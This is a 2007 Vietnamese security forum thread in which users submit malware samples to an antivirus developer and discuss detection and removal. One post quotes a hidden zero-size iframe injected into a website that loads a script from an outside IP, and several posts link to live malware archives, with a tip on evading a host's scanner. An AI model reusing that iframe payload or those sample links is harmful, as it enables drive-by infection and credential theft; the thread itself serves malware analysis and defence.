[Question] |
15/08/2007 12:22:23 (+0700) | #181 | 79008 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
Vì Hoàng không có mẫu của con này. MQK upload lên được không ? |
|
|
|
|
[Question] Re: Nhận mẫu virus |
15/08/2007 12:32:33 (+0700) | #182 | 79012 |
Un-Known
Member
|
0 |
|
|
Joined: 28/06/2006 02:25:57
Messages: 22
Offline
|
|
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=136318
anh coi ở đây nha. Chứ em không có mẫu vì bị BKAV nó diệt mất rồi |
|
|
|
|
[Question] Nhận mẫu virus |
15/08/2007 15:31:36 (+0700) | #183 | 79024 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
Vậy thì chịu, không có... DNA, không có... không nhận dạng được . |
|
|
|
|
[Question] Re: Nhận mẫu virus |
17/08/2007 02:15:57 (+0700) | #184 | 79268 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
MỘt mẫu DNA mới , cần được nghiên cứu )
http://w13.easy-share.com/3372851.html |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Nhận mẫu virus |
17/08/2007 10:12:57 (+0700) | #185 | 79316 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Lại thêm một con perfect keylogger thôi, bind made in VN. BitDefender tóm.
Tui đang thử tìm cách tìm ra tác giả trong 1 đống 5 file .exe, 6 file .dll và 1 đống file .dat, .bin (data file) sau khi tui debug và extract ra. |
|
|
|
|
[Question] Nhận mẫu virus |
17/08/2007 11:06:46 (+0700) | #186 | 79321 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
[FireLion] FastHelper detected được cái mẫu trên đó tmd. PerfectKeylogger |
|
|
|
|
[Question] Nhận mẫu virus |
18/08/2007 00:18:19 (+0700) | #187 | 79407 |
FanJian
Member
|
0 |
|
|
Joined: 17/08/2007 13:10:30
Messages: 1
Offline
|
|
Mấy anh cho em hỏi con Virus nào qua đựoc Depfrzeee không |
|
|
|
|
[Question] Nhận mẫu virus |
18/08/2007 07:44:01 (+0700) | #188 | 79478 |
|
YHT
Member
|
0 |
|
|
Joined: 21/04/2006 13:29:33
Messages: 173
Location: HCM
Offline
|
|
Anh Hoàng ơi, giúp em con này nhé, em thấy con này lâu rồi mà các tool chưa diệt được, triệu chứng là nó thay đổi tiêu đề IE thành Hacked by 1 BYTE {NO VIRUS, NO WORK, NO MONEY}, set autorun và còn gì nữa thì không biết
Phòng máy em đang dùng đang bị một con log on vào là bị hình đầu lâu hiện lên nhưng em chưa xác định được mẫu. Có em up lên cho anh liền.
Mẫu con này đây, trong TuneUp Utilities có nhận biết là Worm nhưng Symantec không diệt được.
Link http://yht4ever.googlepages.com/csrss.rar
--YHT |
|
|
|
|
[Question] Nhận mẫu virus |
18/08/2007 10:54:35 (+0700) | #189 | 79528 |
|
secmask
Elite Member
|
0 |
|
|
Joined: 29/10/2004 13:52:24
Messages: 553
Location: graveyard
Offline
|
|
http://www.mediafire.com/?ej9ebg36bqc
còn này tui dùng bản Fire-Lion hôm qua mà ko thấy , đoán chắc chưa update. bắt đem tặng bác Hoàng
nó chạy 2 process lận , cái này bị kill là lại được cái kia shell lên , detect caption của process explorer để close luôn , file autoruns.exe của sysinternals phải rename mới chạy đc. |
|
|
|
|
[Question] Nhận mẫu virus |
18/08/2007 12:27:06 (+0700) | #190 | 79549 |
TQN
Elite Member
|
0 |
|
|
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
|
|
Con này nguy hiểm lắm đấy, vẫn run được trong Safe Mode, quét và kill 1 list dài các antivirus, antispyware (nhưng mà FireLion của Hoàng không có trong đó), tạo 1 đống service.
Code = Delphi, protect = morphine, rồi packed = FSG.
|
|
|
|
|
[Question] Nhận mẫu virus |
18/08/2007 12:37:59 (+0700) | #191 | 79552 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
@YHT: Sao Hoàng down thì nhận được thông báo file not found ?
@secmask: Thank bạn, Hoàng sẽ update trong db tới, |
|
|
|
|
[Question] Nhận mẫu virus |
18/08/2007 22:14:52 (+0700) | #192 | 79583 |
|
YHT
Member
|
0 |
|
|
Joined: 21/04/2006 13:29:33
Messages: 173
Location: HCM
Offline
|
|
Hình như do anh googlepages detect được là virus nên del của em, qua nay em up hai lần nhưng đều bị mất. Tí nữa em up lai chổ khác.
--YHT |
|
|
|
|
[Question] Nhận mẫu virus |
19/08/2007 04:31:01 (+0700) | #193 | 79654 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
Bạn đặt password cho cái file rar đi là Google không detect được đâu. Ví dụ đặt pass là "infected" hay cái gì đó... |
|
|
|
|
[Question] Nhận mẫu virus |
19/08/2007 05:40:58 (+0700) | #194 | 79665 |
|
YHT
Member
|
0 |
|
|
Joined: 21/04/2006 13:29:33
Messages: 173
Location: HCM
Offline
|
|
Em đã làm theo đúng yêu cầu, anh xem lại link nhé. password như anh nói, trong đó có file txt, tên file la password luôn đó.
BKAV detect được con này rồi nhưng sao diệt nó không tận gốc được, báo diệt rồi mà vẫn bị.
--YHT |
|
|
|
|
[Question] Nhận mẫu virus |
19/08/2007 05:55:13 (+0700) | #195 | 79668 |
JAL
Administrator
|
Joined: 21/12/2001 08:20:25
Messages: 342
Offline
|
|
levuhoang nên tạo cho mọi người dạng upload qua ftp setup trên server cũng đơn giản, upload qua trang free vậy không tiện hơn nữa sẽ khó khăn, đâu phải ai cũng có account |
|
|
|
|
[Question] Nhận mẫu virus |
19/08/2007 06:32:59 (+0700) | #196 | 79674 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
Có đó lão, 1 là upload lên diễn đàn: /hvaonline/posts/list/13337.html
2 là upload lên: http://superupload.fire-lion.com/ |
|
|
|
|
[Question] Nhận mẫu virus |
19/08/2007 17:20:42 (+0700) | #197 | 79759 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
Đã cập nhật 2 con của 2 bạn. Thank secmask & YHT |
|
|
|
|
[Question] Nhận mẫu virus |
20/08/2007 01:07:43 (+0700) | #198 | 79791 |
|
YHT
Member
|
0 |
|
|
Joined: 21/04/2006 13:29:33
Messages: 173
Location: HCM
Offline
|
|
Cám ơn anh Hoàng, mai vô làm em kiếm coi còn con nào nữa chụp đầu nó cho anh xử lý tiếp nhé
--YHT |
|
|
|
|
[Question] Re: Nhận mẫu virus |
23/08/2007 22:45:06 (+0700) | #199 | 80628 |
yesme35
Member
|
0 |
|
|
Joined: 14/08/2007 00:23:57
Messages: 1
Offline
|
|
<iframe src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
===================================
web mình bị 1 người nào đó local và chèn đoạn mã này vào cuối file index. sau 1 và ngày thì bị mất pass yahoo,pass host, noi dung chat bị public HIZ khốn nạn thân tôi (
Khi vào web thì trình kaspersky phát hiện và Ask : decline or accept
xui tay bấm nhầm accept thế là bị nhiễm mà diệt thì không phát hiện được nữa. kaspersky 7 có lience update hằng ngày
|
|
|
|
|
[Question] Re: Nhận mẫu virus |
24/08/2007 07:12:24 (+0700) | #200 | 80799 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Đây là loại JS.Psyme hay HTML!downloader hay js.downloader mà các hảng AV đặt tên. Các trang web bạn vào đã bị hack, và người đó đã thêm vào đoạn mã đó. Tui chỉ biết tới đó thôi. Bạn bấm NO để trình duyệt không thực hiện đoạn mã này là được. |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Nhận mẫu virus |
24/08/2007 17:49:05 (+0700) | #201 | 80864 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
Khi bạn vào trang đó, máy tính sẽ bị cài đặt trojan Bancos. Hoàng nghĩ là Kaspersky có thể search ra được chứ ?
Nếu bạn muốn biết file nào được cài vào máy tính cũng đơn giản. Trong khi duyệt web với IE, nếu có file nào báo là được IE thực thi thì dừng thực thi và copy file đó ra thôi:
Đây cũng là 1 cách hay để test xem trang web có chức malicious code ko
Hoàng toàn dùng cách này để lấy mẫu từ trang web ) |
|
|
|
|
[Question] Nhận mẫu virus |
25/08/2007 06:04:01 (+0700) | #202 | 81021 |
nightmares3000
Member
|
0 |
|
|
Joined: 18/08/2005 02:16:47
Messages: 3
Offline
|
|
_http://9down.com/down.php?site=2&file=Alcohol120_1.9.6.5429_Retail_Incl_Loader.rar
trong crack đó
con này mình thấy fast ko nhận ra
|
|
|
|
|
[Question] Nhận mẫu virus |
26/08/2007 02:11:15 (+0700) | #203 | 81203 |
|
trickyboy
Member
|
0 |
|
|
Joined: 16/05/2005 04:11:45
Messages: 11
Offline
|
|
secmask wrote:
http://www.mediafire.com/?ej9ebg36bqc
còn này tui dùng bản Fire-Lion hôm qua mà ko thấy , đoán chắc chưa update. bắt đem tặng bác Hoàng
nó chạy 2 process lận , cái này bị kill là lại được cái kia shell lên , detect caption của process explorer để close luôn , file autoruns.exe của sysinternals phải rename mới chạy đc.
Dùng Task Explorer thì con này ko detect được đâu. Nếu máy có system restore thì có thể khôi phục lại được (nhưng chạy system restore theo kiểu thường thì ko được, phải load System Restore thông wa 1 debugger hay 1 trình nào có thể tạo process để chạy)
Các file do virus này tạo ra:
2 file nằm trong C:\Program Files\Common Files\System và C:\Program Files\Common Files\Microsoft Shared
1 file của chính nó tự copy trong C:\Program Files
và các file autorun.inf kèm 1 .exe trong mỗi partition
Có thể dùng Total Commander hay trình nào duyệt file/ folder (như ACDSee) để del các file ẩn của nó
|
|
|
|
|
[Question] Nhận mẫu virus |
26/08/2007 23:21:30 (+0700) | #204 | 81359 |
StDevil
Member
|
0 |
|
|
Joined: 26/08/2007 12:00:13
Messages: 1
Offline
|
|
Tình trạng máy mình là như vầy : Hôm qua cái bàn phím vẫn còn bình thường, rồi mình lên google download cái VietKey về xài, hôm nay bật cái máy lên bấm mấy phím: 9 O (chữ o) L và dấu chấm ko dc phải giữ nút kế bên rồi bấm mới dc, và duy nhất phải là phím nằm bên phải nó thôi.Ví dụ : muốn bấm chữ L phải giữ phím ; rồi mới bấm dc. Mình dùng BKAV quét thì thấy có 1 con nằm trong file của VietKey, rồi nó diệt mất tiu lun nên ko lấy mẫu dc. Hix nó quét xong rồi nhưng mà cái bàn phím vẫn chưa bình thường lại dc nữa, ko bít là phải do virus hay là bị lỗi gì nữa, giờ ngồi bấm thấy nản thiệt. Mong mấy bạn giúp dùm mình |
|
|
|
|
[Question] Re: Nhận mẫu virus |
28/08/2007 12:20:18 (+0700) | #205 | 81722 |
|
havythoai
HVA Friend
|
Joined: 05/04/2004 22:59:39
Messages: 562
Offline
|
|
Không biết con này anh Hoàng cập nhật chưa. nghĩa là nó tạo thư mục Local Data trong tất cả các thư mục ở ổ dĩa D, E.
http://rapidshare.com/files/51645705/Local_Data.zip |
|
|
|
|
[Question] Re: Nhận mẫu virus |
29/08/2007 08:05:30 (+0700) | #206 | 81881 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Ai đó thêm thắt vào trong cái file đó Polip.A. Quét online và symantec đều báo Polip.A |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Nhận mẫu virus |
29/08/2007 08:15:28 (+0700) | #207 | 81884 |
kenvich2021
Member
|
0 |
|
|
Joined: 19/04/2005 05:58:45
Messages: 1
Offline
|
|
có ai bít về trojan BotVoice.A... giúp em voi'.. |
|
|
|
|
[Question] Re: Nhận mẫu virus |
30/08/2007 05:32:52 (+0700) | #208 | 82124 |
chloride
Member
|
0 |
|
|
Joined: 07/04/2007 14:46:32
Messages: 9
Offline
|
|
ay da, bác Hoàng lên google mà search, thấy trang nào có chữ trang web này có thể gây hại cho máy bạn thì hùng dũng tiến vào, bác nhớ tắt anti vius. bác cứ tiến sâu khoảng chục chục trang thì ngắt mạng, cái máy bác sẽ là mẫu rất tốt |
|
|
|
|
[Question] Re: Nhận mẫu virus |
06/09/2007 05:47:31 (+0700) | #209 | 83551 |
|
KINYO
Member
|
0 |
|
|
Joined: 30/06/2006 19:10:11
Messages: 272
Location: localhost
Offline
|
|
Nhờ các cao thủ kiểm tra xem nó là con gì, mình nghi một trong hai cái này có chứa virus, có khi là cả hai.
http://condomdom.phpnet.us/Nuhon.zip
http://condomdom.phpnet.us/picachu2.zip |
|
|
[Question] Re: Nhận mẫu virus |
06/09/2007 06:47:21 (+0700) | #210 | 83572 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Quét online cũng cho ra kết quá khá đủ đó. Mấy thứ này để trên mấy trang giải trí 3 xu là Tại họa. Dính trojan nhóm keylogger ào ào. |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|